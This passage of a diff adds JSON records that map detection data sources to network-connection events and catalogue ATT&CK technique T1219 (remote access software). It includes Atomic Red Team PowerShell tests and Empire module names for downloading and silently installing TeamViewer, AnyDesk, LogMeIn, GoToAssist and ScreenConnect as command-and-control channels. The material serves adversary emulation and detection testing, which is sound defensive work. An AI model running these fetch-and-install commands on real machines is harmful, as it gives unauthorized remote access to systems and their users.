"relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + null + ] + }, + { + "technique_id": "T1219", + "command_list": [ + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nStart-Process -Wait $file1 /S; \nStart-Process 'C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe'\n", + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe\"\nStart-Process $file1 /S;\n", + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", + "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", + "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i $installer /qn\n", + "Start-Process $env:temp\\ammyy.exe\n", + "Start-Process $env:temp\\RemotePC.exe\n", + "powershell/management/vnc", + "python/management/osx/screen_sharing" + ], + "commands": [ + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nStart-Process -Wait $file1 /S; \nStart-Process 'C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe'\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe\"\nStart-Process $file1 /S;\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i $installer /qn\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Start-Process $env:temp\\ammyy.exe\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "Start-Process $env:temp\\RemotePC.exe\n", + "source": "atomics/T1219/T1219.yaml", + "name": "Atomic Red Team Test - Remote Access Software" + }, + { + "command": "powershell/management/vnc", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/osx/screen_sharing", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1219", + "display_name": "Remote Access Software", + "atomic_tests": [ + { + "name": "TeamViewer Files Detected Test on Windows", + "auto_generated_guid": "8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0", + "description": "An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\TeamViewer_Setup.exe https://download.teamviewer.com/download/TeamViewer_Setup.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nStart-Process -Wait $file1 /S; \nStart-Process 'C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe'\n", + "cleanup_command": "$file = 'C:\\Program Files (x86)\\TeamViewer\\uninstall.exe'\nif(Test-Path $file){ Start-Process $file \"/S\" -ErrorAction Ignore | Out-Null }\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\TeamViewer_Setup.exe\"\nRemove-Item $file1 -ErrorAction Ignore | Out-Null", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "AnyDesk Files Detected Test on Windows", + "auto_generated_guid": "6b8b7391-5c0a-4f8c-baee-78d8ce0ce330", + "description": "An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\AnyDesk.exe https://download.anydesk.com/AnyDesk.exe\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe\"\nStart-Process $file1 /S;\n", + "cleanup_command": "$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\AnyDesk.exe.exe\"\nRemove-Item $file1 -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "LogMeIn Files Detected Test on Windows", + "auto_generated_guid": "d03683ec-aae0-42f9-9b4c-534780e0f8e1", + "description": "An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Desktop\\LogMeInIgnition.msi https://secure.logmein.com/LogMeInIgnition.msi\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nStart-Process -Wait $file1 /quiet;\nStart-Process 'C:\\Program Files (x86)\\LogMeIn Ignition\\LMIIgnition.exe' \"/S\"\n", + "cleanup_command": "get-package *'LogMeIn Client'* -ErrorAction Ignore | uninstall-package \n$file1 = \"C:\\Users\\\" + $env:username + \"\\Desktop\\LogMeInIgnition.msi\"\nRemove-Item $file1 -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "GoToAssist Files Detected Test on Windows", + "auto_generated_guid": "1b72b3bd-72f8-4b63-a30b-84e91b9c3578", + "description": "An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Invoke-WebRequest -OutFile C:\\Users\\$env:username\\Downloads\\GoToAssist.exe \"https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1\"\n$file1 = \"C:\\Users\\\" + $env:username + \"\\Downloads\\GoToAssist.exe\"\nStart-Process $file1 /S;\n", + "cleanup_command": "try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "ScreenConnect Application Download and Install on Windows", + "auto_generated_guid": "4a18cc4e-416f-4966-9a9d-75731c4684c0", + "description": "An adversary may attempt to trick the user into downloading ScreenConnect for use as a C2 channel. Download of ScreenConnect installer will be in the Downloads directory.\nMsiexec will be used to quietly insall ScreenConnect.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$installer = \"C:\\Users\\$env:username\\Downloads\\ScreenConnect.msi\"\nInvoke-WebRequest -OutFile $installer \"https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi\"\nmsiexec /i 